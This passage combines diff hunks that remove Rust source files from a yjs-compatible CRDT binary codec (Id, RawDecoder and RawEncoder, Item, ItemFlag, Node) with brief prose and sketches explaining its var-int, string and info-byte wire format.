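        *pos += 1;
        if shift >= 64 {
            return None; // too many continuation bytes for a u64
        }
        value |= u64::from(byte & 0x7f) << shift;
        if byte & 0x80 == 0 {
            return Some(value);
        }
        shift += 7;
    }
}

// A range is stored as (start, length) rather than (start, end).
fn encode_range(range: &Range<u64>) -> Vec<u8> {
    let mut out = Vec::new();
    write_var_u64(&mut out, range.start);
    write_var_u64(&mut out, range.end - range.start);
    out
}

fn decode_range(input: &[u8], pos: &mut usize) -> Option<Range<u64>> {
    let clock = read_var_u64(input, pos)?;
    let len = read_var_u64(input, pos)?;
    // checked_add rejects a length that would overflow the clock.
    Some(clock..clock.checked_add(len)?)
}
```

Storing the length keeps the second integer small for short ranges at high clocks, which is where a var-int encoding saves the most bytes.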
@@ -1,68 +0,0 @@
use std::{
fmt::Display,
hash::Hash,
ops::{Add, Sub},
};
pub type Client = u64;
pub type Clock = u64;
#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash, Default)]
#[cfg_attr(fuzzing, derive(arbitrary::Arbitrary))]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub struct Id {
pub client: Client,
pub clock: Clock,
}
impl Id {
pub fn new(client: Client, clock: Clock) -> Self {
Self { client, clock }
}
}
impl From<(Client, Clock)> for Id {
fn from((client, clock): (Client, Clock)) -> Self {
Id::new(client, clock)
}
}
impl Sub<Clock> for Id {
type Output = Id;
fn sub(self, rhs: Clock) -> Self::Output {
(self.client, self.clock - rhs).into()
}
}
impl Add<Clock> for Id {
type Output = Id;
fn add(self, rhs: Clock) -> Self::Output {
(self.client, self.clock + rhs).into()
}
}
impl Display for Id {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "({}, {})", self.client, self.clock)
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn basic_id_operation() {
let id_with_different_client_1 = Id::new(1, 1);
let id_with_different_client_2 = Id::new(2, 1);
assert_ne!(id_with_different_client_1, id_with_different_client_2);
assert_eq!(Id::new(1, 1), Id::new(1, 1));
let clock = 2;
assert_eq!(Id::new(1, 1) + clock, (1, 3).into());
assert_eq!(Id::new(1, 3) - clock, (1, 1).into());
}
}
@@ -1,271 +0,0 @@
use std::io::Cursor;
use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt};
use super::*;
#[inline]
pub fn read_with_cursor<T, F>(buffer: &mut Cursor<&[u8]>, f: F) -> JwstCodecResult<T>
where
F: FnOnce(&[u8]) -> IResult<&[u8], T>,
{
// TODO: use remaining_slice() instead after it is stabilized
let input = buffer.get_ref();
let rest_pos = buffer.position().min(input.len() as u64) as usize;
let input = &input[rest_pos..];
let (tail, result) = f(input).map_err(|e| e.map_input(|u| u.len()))?;
buffer.set_position((rest_pos + input.len() - tail.len()) as u64);
Ok(result)
}
// compatible with ydoc v1
#[derive(Clone)]
pub struct RawDecoder<'b> {
pub(super) buffer: Cursor<&'b [u8]>,
}
impl<'b> RawDecoder<'b> {
pub fn new(buffer: &'b [u8]) -> Self {
Self {
buffer: Cursor::new(buffer),
}
}
pub fn rest_ref(&self) -> &[u8] {
let pos = self.buffer.position();
let buf = self.buffer.get_ref();
if pos == 0 {
buf
} else {
&buf[(pos as usize).min(buf.len())..]
}
}
pub fn drain(self) -> &'b [u8] {
let pos = self.buffer.position() as usize;
let buf = self.buffer.into_inner();
// clamp like `rest_ref`, so a position past the end yields an empty slice instead of a panic
&buf[pos.min(buf.len())..]
}
}
impl CrdtReader for RawDecoder<'_> {
fn is_empty(&self) -> bool {
self.buffer.position() >= self.buffer.get_ref().len() as u64
}
fn len(&self) -> u64 {
self.buffer.get_ref().len() as u64 - self.buffer.position()
}
fn read_var_u64(&mut self) -> JwstCodecResult<u64> {
read_with_cursor(&mut self.buffer, read_var_u64)
}
fn read_var_i32(&mut self) -> JwstCodecResult<i32> {
read_with_cursor(&mut self.buffer, read_var_i32)
}
fn read_var_string(&mut self) -> JwstCodecResult<String> {
read_with_cursor(&mut self.buffer, read_var_string)
}
fn read_var_buffer(&mut self) -> JwstCodecResult<Vec<u8>> {
read_with_cursor(&mut self.buffer, |i| {
read_var_buffer(i).map(|(tail, val)| (tail, val.to_vec()))
})
}
fn read_u8(&mut self) -> JwstCodecResult<u8> {
self.buffer.read_u8().map_err(reader::map_read_error)
}
fn read_f32_be(&mut self) -> JwstCodecResult<f32> {
self.buffer.read_f32::<BigEndian>().map_err(reader::map_read_error)
}
fn read_f64_be(&mut self) -> JwstCodecResult<f64> {
self.buffer.read_f64::<BigEndian>().map_err(reader::map_read_error)
}
fn read_i64_be(&mut self) -> JwstCodecResult<i64> {
self.buffer.read_i64::<BigEndian>().map_err(reader::map_read_error)
}
#[inline(always)]
fn read_info(&mut self) -> JwstCodecResult<u8> {
self.read_u8()
}
#[inline(always)]
fn read_item_id(&mut self) -> JwstCodecResult<Id> {
let client = self.read_var_u64()?;
let clock = self.read_var_u64()?;
Ok(Id::new(client, clock))
}
}
// compatible with ydoc v1
#[derive(Default)]
pub struct RawEncoder {
buffer: Cursor<Vec<u8>>,
}
impl RawEncoder {
pub fn into_inner(self) -> Vec<u8> {
self.buffer.into_inner()
}
}
impl CrdtWriter for RawEncoder {
fn write_var_u64(&mut self, num: u64) -> JwstCodecResult {
write_var_u64(&mut self.buffer, num).map_err(writer::map_write_error)
}
fn write_var_i32(&mut self, num: i32) -> JwstCodecResult {
write_var_i32(&mut self.buffer, num).map_err(writer::map_write_error)
}
fn write_var_string<S: AsRef<str>>(&mut self, s: S) -> JwstCodecResult {
write_var_string(&mut self.buffer, s).map_err(writer::map_write_error)
}
fn write_var_buffer(&mut self, buf: &[u8]) -> JwstCodecResult {
write_var_buffer(&mut self.buffer, buf).map_err(writer::map_write_error)
}
fn write_u8(&mut self, num: u8) -> JwstCodecResult {
self.buffer.write_u8(num).map_err(writer::map_write_error)?;
Ok(())
}
fn write_f32_be(&mut self, num: f32) -> JwstCodecResult {
self.buffer.write_f32::<BigEndian>(num).map_err(writer::map_write_error)
}
fn write_f64_be(&mut self, num: f64) -> JwstCodecResult {
self.buffer.write_f64::<BigEndian>(num).map_err(writer::map_write_error)
}
fn write_i64_be(&mut self, num: i64) -> JwstCodecResult {
self.buffer.write_i64::<BigEndian>(num).map_err(writer::map_write_error)
}
#[inline(always)]
fn write_info(&mut self, num: u8) -> JwstCodecResult {
self.write_u8(num)
}
#[inline(always)]
fn write_item_id(&mut self, id: &Id) -> JwstCodecResult {
self.write_var_u64(id.client)?;
self.write_var_u64(id.clock)?;
Ok(())
}
}
#[cfg(test)]
#[allow(clippy::approx_constant)]
mod tests {
use super::*;
#[test]
fn test_crdt_reader() {
{
let mut reader = RawDecoder::new(&[0xf2, 0x5]);
assert_eq!(reader.read_var_u64().unwrap(), 754);
}
{
let mut reader = RawDecoder::new(&[0x5, b'h', b'e', b'l', b'l', b'o']);
assert_eq!(reader.clone().read_var_string().unwrap(), "hello");
assert_eq!(reader.clone().read_var_buffer().unwrap().as_slice(), b"hello");
assert_eq!(reader.read_u8().unwrap(), 5);
assert_eq!(reader.read_u8().unwrap(), b'h');
assert_eq!(reader.read_u8().unwrap(), b'e');
assert_eq!(reader.read_u8().unwrap(), b'l');
assert_eq!(reader.read_u8().unwrap(), b'l');
assert_eq!(reader.read_u8().unwrap(), b'o');
}
{
let mut reader = RawDecoder::new(&[0x40, 0x49, 0x0f, 0xdb]);
assert_eq!(reader.read_f32_be().unwrap(), 3.1415927);
}
{
let mut reader = RawDecoder::new(&[0x40, 0x09, 0x21, 0xfb, 0x54, 0x44, 0x2d, 0x18]);
assert_eq!(reader.read_f64_be().unwrap(), 3.141592653589793);
}
{
let mut reader = RawDecoder::new(&[0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]);
assert_eq!(reader.read_i64_be().unwrap(), i64::MAX);
}
{
let mut reader = RawDecoder::new(&[0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]);
assert_eq!(reader.read_i64_be().unwrap(), i64::MIN);
}
}
#[test]
fn test_crdt_writer() {
{
let mut writer = RawEncoder::default();
writer.write_var_u64(754).unwrap();
assert_eq!(writer.into_inner(), vec![0xf2, 0x5]);
}
{
let ret = vec![0x5, b'h', b'e', b'l', b'l', b'o'];
let mut writer = RawEncoder::default();
writer.write_var_string("hello").unwrap();
assert_eq!(writer.into_inner(), ret);
let mut writer = RawEncoder::default();
writer.write_var_buffer(b"hello").unwrap();
assert_eq!(writer.into_inner(), ret);
let mut writer = RawEncoder::default();
writer.write_u8(5).unwrap();
writer.write_u8(b'h').unwrap();
writer.write_u8(b'e').unwrap();
writer.write_u8(b'l').unwrap();
writer.write_u8(b'l').unwrap();
writer.write_u8(b'o').unwrap();
assert_eq!(writer.into_inner(), ret);
}
{
let mut writer = RawEncoder::default();
writer.write_f32_be(3.1415927).unwrap();
assert_eq!(writer.into_inner(), vec![0x40, 0x49, 0x0f, 0xdb]);
}
{
let mut writer = RawEncoder::default();
writer.write_f64_be(3.141592653589793).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x40, 0x09, 0x21, 0xfb, 0x54, 0x44, 0x2d, 0x18]
);
}
{
let mut writer = RawEncoder::default();
writer.write_i64_be(i64::MAX).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]
);
}
{
let mut writer = RawEncoder::default();
writer.write_i64_be(i64::MIN).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
);
}
{
let mut writer = RawEncoder::default();
writer.write_info(0x80).unwrap();
assert_eq!(writer.into_inner(), vec![0x80]);
}
{
let mut writer = RawEncoder::default();
writer.write_item_id(&Id::new(1, 2)).unwrap();
assert_eq!(writer.into_inner(), vec![0x1, 0x2]);
}
}
}
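The tests above pin down the v1 wire format for two primitives: `754` is written as `[0xf2, 0x05]`, and `"hello"` is written as a length byte followed by its UTF-8 bytes. A minimal std-only sketch of an encoding consistent with those vectors follows. The function names `encode_var_u64`, `decode_var_u64` and `encode_var_string` are hypothetical and are not the crate's own helpers; the ten-byte limit in the decoder is an assumption of this sketch.

```rust
// Hypothetical helpers for illustration; not the crate's `write_var_u64` / `read_var_u64`.

/// Encode `num` as 7-bit groups, least significant group first.
/// The high bit of each byte signals that more bytes follow.
fn encode_var_u64(mut num: u64) -> Vec<u8> {
    let mut out = Vec::new();
    while num >= 0x80 {
        out.push((num as u8 & 0x7f) | 0x80);
        num >>= 7;
    }
    out.push(num as u8);
    out
}

/// Decode one value and return it together with the number of bytes consumed.
/// Returns `None` on truncated input or when more than ten bytes would be needed.
fn decode_var_u64(bytes: &[u8]) -> Option<(u64, usize)> {
    let mut value = 0u64;
    for (i, &byte) in bytes.iter().enumerate() {
        let shift = 7 * i as u32;
        if shift >= 64 {
            return None;
        }
        value |= u64::from(byte & 0x7f) << shift;
        if byte & 0x80 == 0 {
            return Some((value, i + 1));
        }
    }
    None
}

/// Encode a string as its byte length (var-int) followed by the UTF-8 bytes.
fn encode_var_string(s: &str) -> Vec<u8> {
    let mut out = encode_var_u64(s.len() as u64);
    out.extend_from_slice(s.as_bytes());
    out
}
```

With these definitions, `encode_var_u64(754)` yields `[0xf2, 0x05]` and `encode_var_string("hello")` yields `[0x05, b'h', b'e', b'l', b'l', b'o']`, matching the byte vectors used in `test_crdt_reader` and `test_crdt_writer`.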
@@ -1,9 +0,0 @@
mod codec_v1;
mod reader;
mod writer;
pub use codec_v1::{RawDecoder, RawEncoder};
pub use reader::{CrdtRead, CrdtReader};
pub use writer::{CrdtWrite, CrdtWriter};
use super::*;
@@ -1,30 +0,0 @@
use std::io::Error;
use super::*;
#[inline]
pub fn map_read_error(e: Error) -> JwstCodecError {
JwstCodecError::IncompleteDocument(e.to_string())
}
pub trait CrdtReader {
fn is_empty(&self) -> bool;
fn len(&self) -> u64;
fn read_var_u64(&mut self) -> JwstCodecResult<u64>;
fn read_var_i32(&mut self) -> JwstCodecResult<i32>;
fn read_var_string(&mut self) -> JwstCodecResult<String>;
fn read_var_buffer(&mut self) -> JwstCodecResult<Vec<u8>>;
fn read_u8(&mut self) -> JwstCodecResult<u8>;
fn read_f32_be(&mut self) -> JwstCodecResult<f32>;
fn read_f64_be(&mut self) -> JwstCodecResult<f64>;
fn read_i64_be(&mut self) -> JwstCodecResult<i64>;
fn read_info(&mut self) -> JwstCodecResult<u8>;
fn read_item_id(&mut self) -> JwstCodecResult<Id>;
}
pub trait CrdtRead<R: CrdtReader> {
fn read(reader: &mut R) -> JwstCodecResult<Self>
where
Self: Sized;
}
@@ -1,28 +0,0 @@
use std::io::Error;
use super::*;
#[inline]
pub fn map_write_error(e: Error) -> JwstCodecError {
JwstCodecError::InvalidWriteBuffer(e.to_string())
}
pub trait CrdtWriter {
fn write_var_u64(&mut self, num: u64) -> JwstCodecResult;
fn write_var_i32(&mut self, num: i32) -> JwstCodecResult;
fn write_var_string<S: AsRef<str>>(&mut self, s: S) -> JwstCodecResult;
fn write_var_buffer(&mut self, buf: &[u8]) -> JwstCodecResult;
fn write_u8(&mut self, num: u8) -> JwstCodecResult;
fn write_f32_be(&mut self, num: f32) -> JwstCodecResult;
fn write_f64_be(&mut self, num: f64) -> JwstCodecResult;
fn write_i64_be(&mut self, num: i64) -> JwstCodecResult;
fn write_info(&mut self, num: u8) -> JwstCodecResult;
fn write_item_id(&mut self, id: &Id) -> JwstCodecResult;
}
pub trait CrdtWrite<W: CrdtWriter> {
fn write(&self, writer: &mut W) -> JwstCodecResult
where
Self: Sized;
}
@@ -1,440 +0,0 @@
use super::*;
#[derive(Debug, Clone)]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub(crate) enum Parent {
#[cfg_attr(test, proptest(skip))]
Type(YTypeRef),
#[cfg_attr(test, proptest(value = "Parent::String(SmolStr::default())"))]
String(SmolStr),
Id(Id),
}
#[derive(Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) struct Item {
pub id: Id,
pub origin_left_id: Option<Id>,
pub origin_right_id: Option<Id>,
#[cfg_attr(all(test, not(loom)), proptest(value = "Somr::none()"))]
pub left: ItemRef,
#[cfg_attr(all(test, not(loom)), proptest(value = "Somr::none()"))]
pub right: ItemRef,
pub parent: Option<Parent>,
#[cfg_attr(all(test, not(loom)), proptest(value = "Option::<SmolStr>::None"))]
pub parent_sub: Option<SmolStr>,
pub content: Content,
#[cfg_attr(all(test, not(loom)), proptest(value = "ItemFlag::default()"))]
pub flags: ItemFlag,
}
// make all Item readonly
pub(crate) type ItemRef = Somr<Item>;
impl PartialEq for Item {
fn eq(&self, other: &Self) -> bool {
self.id == other.id
}
}
impl Eq for Item {}
impl std::fmt::Debug for Item {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut dbg = f.debug_struct("Item");
dbg
.field("id", &self.id)
.field("origin_left_id", &self.origin_left_id)
.field("origin_right_id", &self.origin_right_id);
if let Some(left) = self.left.get() {
dbg.field("left", &left.id);
}
if let Some(right) = self.right.get() {
dbg.field("right", &right.id);
}
dbg
.field(
"parent",
&self.parent.as_ref().map(|p| match p {
Parent::Type(_) => "[Type]".to_string(),
Parent::String(name) => format!("Parent({name})"),
Parent::Id(id) => format!("({}, {})", id.client, id.clock),
}),
)
.field("parent_sub", &self.parent_sub)
.field("content", &self.content)
.field("flags", &self.flags)
.finish()
}
}
impl std::fmt::Display for Item {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "Item{}: [{:?}]", self.id, self.content)
}
}
impl Default for Item {
fn default() -> Self {
Self {
id: Id::default(),
origin_left_id: None,
origin_right_id: None,
left: Somr::none(),
right: Somr::none(),
parent: None,
parent_sub: None,
content: Content::Deleted(0),
flags: ItemFlag::from(0),
}
}
}
impl Item {
pub fn new(
id: Id,
content: Content,
left: Somr<Item>,
right: Somr<Item>,
parent: Option<Parent>,
parent_sub: Option<SmolStr>,
) -> Self {
let flags = ItemFlag::from(if content.countable() {
item_flags::ITEM_COUNTABLE
} else {
0
});
Self {
id,
origin_left_id: left.get().map(|left| left.last_id()),
left,
origin_right_id: right.get().map(|right| right.id),
right,
parent,
parent_sub,
content,
flags,
}
}
// find a node that has parent info
// in the crdt tree, not every node has parent info,
// so we check the left and right nodes for it
pub fn find_node_with_parent_info(&self) -> Option<Item> {
if self.parent.is_some() {
return Some(self.clone());
} else if let Some(item) = self.left.get() {
if item.parent.is_none() {
if let Some(item) = item.right.get() {
return Some(item.clone());
}
} else {
return Some(item.clone());
}
} else if let Some(item) = self.right.get() {
return Some(item.clone());
}
None
}
pub fn len(&self) -> u64 {
self.content.clock_len()
}
pub fn deleted(&self) -> bool {
self.flags.deleted()
}
pub fn delete(&self) -> bool {
if self.deleted() {
return false;
}
self.flags.set_deleted();
true
}
pub fn countable(&self) -> bool {
self.flags.countable()
}
pub fn keep(&self) -> bool {
self.flags.keep()
}
pub fn indexable(&self) -> bool {
self.countable() && !self.deleted()
}
pub fn last_id(&self) -> Id {
let Id { client, clock } = self.id;
Id::new(client, clock + self.len() - 1)
}
pub fn split_at(&self, offset: u64) -> JwstCodecResult<(Self, Self)> {
debug_assert!(offset > 0 && self.len() > 1 && offset < self.len());
let id = self.id;
let right_id = Id::new(id.client, id.clock + offset);
let (left_content, right_content) = self.content.split(offset)?;
let left_item = Item::new(
id,
left_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
self.parent.clone(),
self.parent_sub.clone(),
);
let right_item = Item::new(
right_id,
right_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
self.parent.clone(),
self.parent_sub.clone(),
);
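// propagate the deleted/keep flags of the original item to both halves
// (checking the freshly built `left_item` would always be a no-op)
if self.deleted() {
left_item.flags.set_deleted();
right_item.flags.set_deleted();
}
if self.keep() {
left_item.flags.set_keep();
right_item.flags.set_keep();
}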
Ok((left_item, right_item))
}
fn get_info(&self) -> u8 {
let mut info = self.content.get_info();
if self.origin_left_id.is_some() {
info |= item_flags::ITEM_HAS_LEFT_ID;
}
if self.origin_right_id.is_some() {
info |= item_flags::ITEM_HAS_RIGHT_ID;
}
if self.parent_sub.is_some() {
info |= item_flags::ITEM_HAS_PARENT_SUB;
}
info
}
pub fn is_valid(&self) -> bool {
let has_id = self.origin_left_id.is_some() || self.origin_right_id.is_some();
!has_id && self.parent.is_some() || has_id && self.parent.is_none() && self.parent_sub.is_none()
}
pub fn read<R: CrdtReader>(decoder: &mut R, id: Id, info: u8, first_5_bit: u8) -> JwstCodecResult<Self> {
let flags: ItemFlag = info.into();
let has_left_id = flags.check(item_flags::ITEM_HAS_LEFT_ID);
let has_right_id = flags.check(item_flags::ITEM_HAS_RIGHT_ID);
let has_parent_sub = flags.check(item_flags::ITEM_HAS_PARENT_SUB);
let has_not_sibling = flags.not(item_flags::ITEM_HAS_SIBLING);
// NOTE: the read order must match the order used by yjs
// TODO: this data layout hinders CPU out-of-order execution and needs to be optimized
let item = Self {
id,
origin_left_id: if has_left_id {
Some(decoder.read_item_id()?)
} else {
None
},
origin_right_id: if has_right_id {
Some(decoder.read_item_id()?)
} else {
None
},
parent: {
if has_not_sibling {
let has_parent = decoder.read_var_u64()? == 1;
Some(if has_parent {
Parent::String(SmolStr::new(decoder.read_var_string()?))
} else {
Parent::Id(decoder.read_item_id()?)
})
} else {
None
}
},
parent_sub: if has_not_sibling && has_parent_sub {
Some(SmolStr::new(decoder.read_var_string()?))
} else {
None
},
content: {
// the tag must not be GC (0) or Skip (10); those are handled by the caller (see `Node::read`)
debug_assert_ne!(first_5_bit, 0);
debug_assert_ne!(first_5_bit, 10);
Content::read(decoder, first_5_bit)?
},
left: Somr::none(),
right: Somr::none(),
flags: ItemFlag::from(0),
};
if item.content.countable() {
item.flags.set_countable();
}
if matches!(item.content, Content::Deleted(_)) {
item.flags.set_deleted();
}
debug_assert!(item.is_valid());
Ok(item)
}
pub fn write<W: CrdtWriter>(&self, encoder: &mut W) -> JwstCodecResult {
let info = self.get_info();
let has_not_sibling = info & item_flags::ITEM_HAS_SIBLING == 0;
encoder.write_info(info)?;
if let Some(left_id) = self.origin_left_id {
encoder.write_item_id(&left_id)?;
}
if let Some(right_id) = self.origin_right_id {
encoder.write_item_id(&right_id)?;
}
if has_not_sibling {
if let Some(parent) = &self.parent {
match parent {
Parent::String(s) => {
encoder.write_var_u64(1)?;
encoder.write_var_string(s)?;
}
Parent::Id(id) => {
encoder.write_var_u64(0)?;
encoder.write_item_id(id)?;
}
Parent::Type(ty) => {
if let Some(ty) = ty.ty() {
if let Some(item) = ty.item.get() {
encoder.write_var_u64(0)?;
encoder.write_item_id(&item.id)?;
} else if let Some(name) = &ty.root_name {
encoder.write_var_u64(1)?;
encoder.write_var_string(name)?;
}
}
}
}
} else {
// if the item is deleted, it must not exist in the crdt state tree
debug_assert!(!self.deleted());
return Err(JwstCodecError::ParentNotFound);
}
if let Some(parent_sub) = &self.parent_sub {
encoder.write_var_string(parent_sub)?;
}
}
self.content.write(encoder)?;
Ok(())
}
pub fn deep_compare(&self, other: &Self) -> bool {
if self.id != other.id
|| self.deleted() != other.deleted()
|| self.len() != other.len()
|| self.left.get().map(|l| l.last_id()) != other.left.get().map(|l| l.last_id())
|| self.right.get().map(|r| r.id) != other.right.get().map(|r| r.id)
|| self.origin_left_id != other.origin_left_id
|| self.origin_right_id != other.origin_right_id
|| self.parent_sub != other.parent_sub
{
return false;
}
true
}
}
#[allow(dead_code)]
#[cfg(any(debug_assertions, test))]
impl Item {
pub fn print_left(&self) {
let mut ret = vec![format!("Self{}: [{:?}]", self.id, self.content)];
let mut left: Somr<Item> = self.left.clone();
while let Some(item) = left.get() {
ret.push(format!("{item}"));
left = item.left.clone();
}
ret.reverse();
println!("{}", ret.join(" <- "));
}
pub fn print_right(&self) {
let mut ret = vec![format!("Self{}: [{:?}]", self.id, self.content)];
let mut right = self.right.clone();
while let Some(item) = right.get() {
ret.push(format!("{item}"));
right = item.right.clone();
}
println!("{}", ret.join(" -> "));
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use proptest::{collection::vec, prelude::*};
#[cfg(not(loom))]
use super::*;
#[cfg(not(loom))]
fn item_round_trip(item: &mut Item) -> JwstCodecResult {
if !item.is_valid() {
return Ok(());
}
if item.content.countable() {
item.flags.set_countable();
}
let mut encoder = RawEncoder::default();
item.write(&mut encoder)?;
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let info = decoder.read_info()?;
let first_5_bit = info & 0b11111;
let decoded_item = Item::read(&mut decoder, item.id, info, first_5_bit)?;
assert_eq!(item, &decoded_item);
Ok(())
}
#[cfg(not(loom))]
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_content(mut items in vec(any::<Item>(), 0..10)) {
for item in &mut items {
item_round_trip(item).unwrap();
}
}
}
}
@@ -1,170 +0,0 @@
use std::sync::atomic::{AtomicU8, Ordering};
#[rustfmt::skip]
#[allow(dead_code)]
pub mod item_flags {
pub const ITEM_KEEP : u8 = 0b0000_0001;
pub const ITEM_COUNTABLE : u8 = 0b0000_0010;
pub const ITEM_DELETED : u8 = 0b0000_0100;
pub const ITEM_MARKED : u8 = 0b0000_1000;
pub const ITEM_HAS_PARENT_SUB : u8 = 0b0010_0000;
pub const ITEM_HAS_RIGHT_ID : u8 = 0b0100_0000;
pub const ITEM_HAS_LEFT_ID : u8 = 0b1000_0000;
pub const ITEM_HAS_SIBLING : u8 = 0b1100_0000;
}
#[derive(Debug)]
pub struct ItemFlag(pub(self) AtomicU8);
impl Default for ItemFlag {
fn default() -> Self {
Self(AtomicU8::new(0))
}
}
impl Clone for ItemFlag {
fn clone(&self) -> Self {
Self(AtomicU8::new(self.0.load(Ordering::Acquire)))
}
}
impl From<u8> for ItemFlag {
fn from(flags: u8) -> Self {
Self(AtomicU8::new(flags))
}
}
#[allow(dead_code)]
impl ItemFlag {
#[inline(always)]
pub fn set(&self, flag: u8) {
self.0.fetch_or(flag, Ordering::SeqCst);
}
#[inline(always)]
pub fn clear(&self, flag: u8) {
self.0.fetch_and(!flag, Ordering::SeqCst);
}
#[inline(always)]
pub fn check(&self, flag: u8) -> bool {
self.0.load(Ordering::Acquire) & flag == flag
}
#[inline(always)]
pub fn not(&self, flag: u8) -> bool {
self.0.load(Ordering::Acquire) & flag == 0
}
#[inline(always)]
pub fn keep(&self) -> bool {
self.check(item_flags::ITEM_KEEP)
}
#[inline(always)]
pub fn set_keep(&self) {
self.set(item_flags::ITEM_KEEP);
}
#[inline(always)]
pub fn clear_keep(&self) {
self.clear(item_flags::ITEM_KEEP);
}
#[inline(always)]
pub fn countable(&self) -> bool {
self.check(item_flags::ITEM_COUNTABLE)
}
#[inline(always)]
pub fn set_countable(&self) {
self.set(item_flags::ITEM_COUNTABLE);
}
#[inline(always)]
pub fn clear_countable(&self) {
self.clear(item_flags::ITEM_COUNTABLE);
}
#[inline(always)]
pub fn deleted(&self) -> bool {
self.check(item_flags::ITEM_DELETED)
}
#[inline(always)]
pub fn set_deleted(&self) {
self.set(item_flags::ITEM_DELETED);
}
#[inline(always)]
pub fn clear_deleted(&self) {
self.clear(item_flags::ITEM_DELETED);
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_flag_set_and_clear() {
{
let flag = super::ItemFlag::default();
assert!(!flag.keep());
flag.set_keep();
assert!(flag.keep());
flag.clear_keep();
assert!(!flag.keep());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
assert!(!flag.countable());
flag.set_countable();
assert!(flag.countable());
flag.clear_countable();
assert!(!flag.countable());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
assert!(!flag.deleted());
flag.set_deleted();
assert!(flag.deleted());
flag.clear_deleted();
assert!(!flag.deleted());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
flag.set_keep();
flag.set_countable();
flag.set_deleted();
assert!(flag.keep());
assert!(flag.countable());
assert!(flag.deleted());
flag.clear_keep();
flag.clear_countable();
flag.clear_deleted();
assert!(!flag.keep());
assert!(!flag.countable());
assert!(!flag.deleted());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
}
}
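As `Item::read` and `Node::read` use it, the info byte packs the content tag into its low five bits and three presence flags into its high bits. The parent is only written inline when neither origin id is present. The sketch below restates that layout with std only. The bit constants are copied from `item_flags` above, while `InfoBits` and `decode_info` are hypothetical names introduced for illustration.

```rust
// Bit positions copied from `item_flags`; `InfoBits` and `decode_info` are
// hypothetical names used only in this sketch.
const ITEM_HAS_PARENT_SUB: u8 = 0b0010_0000;
const ITEM_HAS_RIGHT_ID: u8 = 0b0100_0000;
const ITEM_HAS_LEFT_ID: u8 = 0b1000_0000;
const ITEM_HAS_SIBLING: u8 = 0b1100_0000;

#[derive(Debug, PartialEq, Eq)]
struct InfoBits {
    /// Low five bits: the content tag (0 = GC, 10 = Skip, anything else is an item).
    content_tag: u8,
    has_left_id: bool,
    has_right_id: bool,
    has_parent_sub: bool,
    /// True when neither origin id is present, so the parent is encoded inline.
    parent_follows: bool,
}

/// Split an info byte into its tag and flag components.
fn decode_info(info: u8) -> InfoBits {
    InfoBits {
        content_tag: info & 0b0001_1111,
        has_left_id: info & ITEM_HAS_LEFT_ID != 0,
        has_right_id: info & ITEM_HAS_RIGHT_ID != 0,
        has_parent_sub: info & ITEM_HAS_PARENT_SUB != 0,
        parent_follows: info & ITEM_HAS_SIBLING == 0,
    }
}
```

For example, `decode_info(0b1010_0100)` reports content tag 4 with a left origin id and a parent sub key, and `parent_follows` is false because an origin id is present.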
@@ -1,25 +0,0 @@
mod any;
mod content;
mod delete_set;
mod id;
mod io;
mod item;
mod item_flag;
mod refs;
mod update;
#[cfg(test)]
mod utils;
pub use any::Any;
pub(crate) use content::Content;
pub use delete_set::DeleteSet;
pub use id::{Client, Clock, Id};
pub use io::{CrdtRead, CrdtReader, CrdtWrite, CrdtWriter, RawDecoder, RawEncoder};
pub(crate) use item::{Item, ItemRef, Parent};
pub(crate) use item_flag::{ItemFlag, item_flags};
pub(crate) use refs::Node;
pub use update::Update;
#[cfg(test)]
pub(crate) use utils::*;
use super::*;
@@ -1,488 +0,0 @@
use super::*;
// make fields Copy + Clone without much effort
#[derive(Debug, Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) enum Node {
GC(Box<NodeLen>),
Skip(Box<NodeLen>),
Item(ItemRef),
}
/// Simple representation of id and len struct used by GC and Skip node.
#[derive(Debug, Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) struct NodeLen {
pub id: Id,
pub len: u64,
}
impl<W: CrdtWriter> CrdtWrite<W> for Node {
fn write(&self, writer: &mut W) -> JwstCodecResult {
match self {
Node::GC(item) => {
writer.write_info(0)?;
writer.write_var_u64(item.len)
}
Node::Skip(item) => {
writer.write_info(10)?;
writer.write_var_u64(item.len)
}
Node::Item(item) => item.get().unwrap().write(writer),
}
}
}
impl PartialEq for Node {
fn eq(&self, other: &Self) -> bool {
match (self, other) {
(Node::GC(left), Node::GC(right)) => left.id == right.id,
(Node::Skip(left), Node::Skip(right)) => left.id == right.id,
(Node::Item(item1), Node::Item(item2)) => item1.get() == item2.get(),
_ => false,
}
}
}
impl Eq for Node {}
impl From<Item> for Node {
fn from(value: Item) -> Self {
